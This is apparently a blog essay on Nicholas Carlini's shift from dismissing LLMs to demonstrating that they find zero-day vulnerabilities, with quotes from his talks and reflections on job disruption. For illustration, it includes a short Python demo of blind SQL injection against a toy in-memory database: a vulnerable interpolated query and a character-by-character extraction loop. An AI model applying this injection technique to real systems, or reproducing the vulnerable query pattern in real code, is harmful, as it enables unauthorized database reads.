Fun Toys
Nicholas Carlini is a security researcher at Anthropic. Before that he was at Google DeepMind. He’s been finding ways to break neural networks since his mid-twenties, when he published attacks that hid voice commands inside white noise, tricking voice assistants while their owners heard nothing. His 2017 paper with David Wagner became one of the standard references for adversarial attacks on machine learning systems. He’s the kind of person whose career is built on proving that things people trust are less secure than they think.
Here he is in March 2025, writing about the position he’d held on large language models for years:
These models are fun toys to play around with, but have no practical real world utility. I studied them as toy research objects which might be useful for individual specific tasks like sentiment analysis or translation, but never as general purpose technologies.
I didn’t believe in the applications of LLMs because it seemed obvious to me that training on next token prediction wasn’t going to be able to give you coherent responses across more than a few paragraphs. And I was fairly certain that next-token prediction (1) wouldn’t get the model to build some kind of internal world model, and therefore (2) would cap out at just being some simple statistical next token predictor.
Oh, that 540 billion parameter model can explain jokes? That’s cute; tell me when it can do something useful.
That’s from his blog post “My Thoughts on the Future of ‘AI’”, where he lays out years of quiet scepticism and then says plainly: “I was wrong. I have changed my mind.”
What followed was a year of increasingly urgent public appearances. A FORC keynote at Stanford in June 2025, “How LLMs could enable harm at scale”, where he walked through how attackers could weaponise models for fraud and exploitation. A COLM keynote in October, “Are the harms and risks of LLMs worth it?”, where he weighed the benefits of the technology against its costs and refused to declare a winner. Each talk a step further from “fun toys”, and more concrete about what was coming.
And then last week he gave a talk at Anthropic’s [un]prompted conference called “Black-hat LLMs”, and it wasn’t theoretical anymore. He demoed Claude finding zero-day vulnerabilities live on stage. A blind SQL injection in Ghost that allowed unauthenticated database reads. A heap buffer overflow in the Linux kernel’s NFSv4 daemon that had been sitting there since 2003, missed by human auditors and fuzzers alike.
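To make "blind SQL injection" concrete: the attacker never sees query results directly, only a yes/no signal, and recovers data by asking one boolean question at a time. This is a toy simulation of the general technique, not the actual Ghost vulnerability; the table, column names, and endpoint are all hypothetical, and the "server" is just an in-memory SQLite database.

```python
import sqlite3

# A stand-in for the application's database (hypothetical schema).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'hunter2')")

def vulnerable_lookup(name: str) -> bool:
    # The flaw: user input is interpolated straight into SQL.
    # The endpoint reveals only whether a row matched -- nothing else.
    query = f"SELECT 1 FROM users WHERE name = '{name}'"
    return db.execute(query).fetchone() is not None

def leak_secret() -> str:
    # With only yes/no answers, the attacker extends a LIKE prefix
    # one character at a time until no character matches any further.
    recovered = ""
    while True:
        for c in "abcdefghijklmnopqrstuvwxyz0123456789":
            probe = f"admin' AND secret LIKE '{recovered + c}%"
            if vulnerable_lookup(probe):
                recovered += c
                break
        else:
            return recovered  # no extension matched: secret fully recovered

print(leak_secret())  # prints hunter2, read without any direct access
```

Each probe turns the query into `... name = 'admin' AND secret LIKE 'h%'`, so a single bit of information leaks per request; with enough requests, the whole database is readable. That is what "unauthenticated database reads" means in practice.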
His summary slide:
LLMs can autonomously, and without fancy scaffolding, find and exploit 0days in critical software. And they are getting good scarily fast.
On a podcast recorded around the same time, he put it more personally:
I said the models are better vulnerability researchers than me. It’s not the case that if you gave the model a very small piece of code that was self-contained and 300 lines long and I could reason and it could reason the same amount of time on that piece of code, I would win. I’m still more intelligent than the model, but what I can’t do is analyze literally every program or every C file in the entire Linux kernel and try to find bugs.
“Fun toys” to “better vulnerability researchers than me” in under two years, from someone whose career was built on being one of the best in the world at exactly this.
The thing that struck me watching the talk wasn’t the security angle on its own. It’s that Carlini’s field is just one field. He was paying attention, and he had the expertise to benchmark what the models could do against what he could do himself, and the answer was: more, faster, cheaper. Someone in every cognitively demanding field is about to have that moment, or already has and hasn’t said it out loud yet.
Carlini’s boss seems to agree. Dario Amodei has been on a press tour this year warning that entry-level white-collar work faces serious disruption within one to five years. He’s the CEO of the company that built the model that outperformed his own security researcher, and it would be easy to dismiss that as marketing if the researcher in question hadn’t just demonstrated it on stage.
Asked about the long-term outlook during the Q&A, Carlini said defenders probably win eventually: rewrite things in Rust, kill the memory bugs, formally verify the protocols. But he compared the transition to the Industrial Revolution: good endgame, brutal ride. The question nobody in that room could answer is how long the ride takes and who gets thrown off.